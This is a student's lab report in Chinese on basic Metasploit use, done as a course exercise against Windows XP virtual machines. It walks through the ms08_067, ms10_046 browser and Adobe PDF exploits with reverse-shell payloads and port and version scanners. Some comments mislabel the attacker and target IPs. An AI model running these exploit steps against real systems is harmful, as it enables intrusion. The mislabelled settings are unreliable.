2015306 白皎 《网络攻防》Exp5 MSF基础应用

一、基础问题

  • 用自己的话解释什么是exploit,payload,encode.
exploit指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,选择exploit模块的数量、源码,将真正要负责攻击的代码传送到靶机中。

payload也就是载荷,是目标系统在被渗透攻击之后去执行的代码,就像我们之前的shellcode。

encode进行编码,确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”,以及改变特征码,对攻击载荷进行“免杀”处理

二、实践内容

1.1一个主动攻击实践【ms08_067】

  • 启用msf终端
msfconsole
  • 使用search命令搜索该漏洞对应的模块,可以看到渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi”
search ms08_067

  • 启用该渗透攻击模块来查看基本信息
use exploit/windows/smb/ms08_067_netapi

-查看该模块所适用的攻击载荷模块,之后选择其中一个

show payloads
  • 选择攻击载荷:
set payload generic/shell_reverse_tcp
  • 查看配置渗透攻击所需的配置项:
show options
  • 根据目标情况配置渗透攻击的各个选项,
set RHOST 192.168.241.130 //设置攻击Ip
set LPORT 5306//回连主机端口号
set LHOST 192.168.241.129//被攻击机ip
set target 5//目标系统类型为5

  • 查看设置后的选项设置的值是否正确

  • 发起渗透攻击
exploit

1.2 一个针对浏览器的攻击【ms10_046】

  • 使用search命令搜索该漏洞对应的模块,可以看到渗透攻击模块路径名
search ms11_050

  • 启用该渗透攻击模块来查看基本信息
use windows/browser/ms11_050_mshtml_cobjectelement

-查看该模块所适用的攻击载荷模块,之后选择其中一个

show payloads
  • 选择攻击载荷:
set payload generic/shell_reverse_tcp
  • 查看配置渗透攻击所需的配置项,根据目标情况配置渗透攻击的各个选项
show options

set SRVHOST 192.168.44.130 //本地监听主机的IP地址,即攻击Ip
set LPORT 5306//回连主机端口号
set LHOST 192.168.44.130//攻击机ip
set URIPATH 20155306
  • 查看设置后的选项设置的值是否正确

但是不知道为什么用ms11_050模块总是攻击不成功,换了好几种不同的xp都不行,所以下面用ms10_046来实现。

  • 一些搜索的步骤和之前一样,在这里就不再赘述。我们直接使用该模块:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  • show payloads来查看我们可以使用的载荷,并选择一个使用

  • 通过show options查看需要设置的参数,进行设置后,再次用show options来检查
set SRVHOST 192.168.44.130
set LPORT 5306
set LHOST 192.168.44.130
set URIPATH 20155306//选择性设置

  • 发起渗透攻击,可以看到生成了一个url
exploit

  • 在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功

  • 使用sessions

    指令查看当前存在的会话,然后使用sessions -i 1选择会话1,即可获取靶机信息,其ip是192.168.44.129是我的xp没错啦,然后用shell获取靶机的命令行

1.3 一个针对客户端的攻击【Adobe】

  • 使用search命令搜索该漏洞对应的模块,可以自己任意选择一个使用,
search adobe
use exploit/windows/fileformat/adobe_toolbutton

-查看载荷模块,并选择其中一个

show payloads
set payload generic/shell_reverse_tcp

  • 查看配置渗透攻击所需的配置项,修改配置后再进行检查
show options
set LPORT 5306//回连主机端口号
set LHOST 192.168.44.130//攻击机ip
set FILENAME 5306.pdf

  • 发起渗透攻击,可以看到/root/.msf4/local/下生成5306.pdf的文件
exploit

  • 然后使用监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.130
set LPORT 5306

  • 将pdf文件复制粘贴到xp靶机上,用adobe方式打开,可以看到成功获取靶机的shell啦

1.4 成功应用任何一个辅助模块【 scanner/mysql/mysql-version, scanner/portscan/syn,rdp/ms12_020check】

  • 使用search命令搜索辅助模块

1. scanner/mysql/mysql-version模块

  • 首先我选择的是 scanner/mysql/mysql-version

  • use scanner/mysql/mysql-version 应用该模块,然后通过通过show options查看需要设置的参数,设置好之后,便可以进行扫描,得到靶机数据库的版本。

2. scanner/portscan/syn模块

  • 同理,通过use scanner/portscan/syn 应用该模块,然后通过通过show options查看需要设置的参数

  • 检查参数设置无误之后,开始扫描,可以直观的看到靶机开放连接一些端口号

3. rdp/ms12_020check模块

  • auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞。具体步骤如下图所示:

  • 运行后显示关于漏洞是否可利用是不可靠的

三、 遇到的问题

问题一:配置好参数之后运行时,出现Hander failed to bind to192.168.44.128:56,为什么本机的ip,端口号都无法绑定?

解决:我尝试用ifconfig查看本机ip,发现查不到说明我的kali没有联网。打开/etc/network/interfaces,如下图增加最后两行。最后,在terminal里执行 /etc/init.d/networking restart 重启网络,使刚才的配置生效,done。详见教程:kali无法正常上网的解决过程

四、 实践总结与体会

本次实验感受到msf平台是很强大的,有特别多不同的模块,不同的功能来帮助我们去了解靶机信息。

但从另一方面讲,我们的windows也这样暴露在外面,可以被别人进行信息搜集和攻击,因此一定要经常杀杀毒,打好补丁!

2015306 白皎 《网络攻防》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 20145330 《网络攻防》 MSF基础应用

    20145330 <网络攻防> MSF基础应用 1.实验后回答问题 (1)用自己的话解释什么是exploit,payload,encode. exploit:进行渗透攻击的模块合集 pay ...

  5. 《网络攻防》 MSF基础应用

    20145224陈颢文 <网络攻防>MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode: exploit:攻击手段,是能使攻击武器(payloa ...

  6. 20145239杜文超《网络攻防》- MSF基础应用

    20145239杜文超<网络攻防>- MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit:实现攻击行为的主体,但没有载荷只 ...

  7. 20145306 《网络攻防》 MSF基础应用

    20145306张文锦<网络对抗>MSF应用 Adobe阅读器渗透攻击 两台虚拟机,其中一台为kali,一台为windows xp sp3,并保证两台虚拟机可以ping通. 实验过程 进入 ...

  8. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  9. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  10. 20145334赵文豪《网络攻防》 MSF基础应用

    实践目标 掌握metasploit的基本应用方式 掌握常用的三种攻击方式的思路. 实验要求 一个主动攻击,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adob ...

随机推荐

  1. 【转】ubuntu右键在当前位置打开终端

    ubuntu右键在当前位置打开终端   ubuntu增加右键命令:   在终端中打开   软件中心:   搜索nautilus-open-terminal安装   命令行:   sudo apt-ge ...

  2. log4j配置详解(非常详细)

    Log4J的配置文件(Configuration File)就是用来设置记录器的级别.存放器和布局的,它可接key=value格式的设置或xml格式的设置信息.通过配置,可以创建出Log4J的运行环境 ...

  3. [UI] 精美UI界面欣赏[1]

    精美UI界面欣赏[1]

  4. 如何生成.mobileprovision文件

    如何生成.mobileprovision文件 本人视频教程系列 **.mobileprovision文件的生成的第一步就需要你提供一个用于开发的App ID 1. 创建App ID 创建一个bundl ...

  5. wxpython 窗口排版- proportion/flag/border参数说明

    新学习wxpython,一直纠结于窗口控件的排版,经过几天的查资料.试验,总结如下. 1.需求实例 来个实例,窗口有3行控件 第一行是文本提示(大小不变,文字左对齐,控件居左). 第二行依次为文本提示 ...

  6. ZT 4.3 android bluetooth hfp分析

    4.3 android bluetooth hfp分析 2013-08-20 20:16 592人阅读 评论(3) 收藏 举报 所有程序执行的代码都是有入口的,在这里我们暂时分析一种情景,蓝牙打开着, ...

  7. Ubuntu通过Pyenv管理python版本

    网上安装使用Pyenv的教程很多,但是实测有很多教程有坑,经过多家比较发现下面的教程可用,内容全面,与大家分享. 首先安装pyenv全家桶 curl -L https://raw.githubuser ...

  8. RTCM32转码至RTCM23,再次测试,一些收获

    RTCM32是2013年发布的,RTCM23是2001年发布,两者相隔十多年,某些软件已经不支持RTCM32的解码.故在此对RTCM32的编码进行转换,使用2018年4月9日天宝接收机数据.编码格式为 ...

  9. php解决约瑟夫环的问题

    php里面解决约瑟夫环还是比较方面的,但是下面的方法太费空间 <?php class SelectKing{ private $m;//幅度 private $n;//总数 public fun ...

  10. java内存分配策略

    对象的内存分配,从大方向将就是在堆上分配,对象主要分配在新生代的Eden区上,如果启动了本地线程分配缓存,将按线程优先在TLAB上分配. 1. 对象优先在Eden区分配:大多数情况下,对象在新生代Ed ...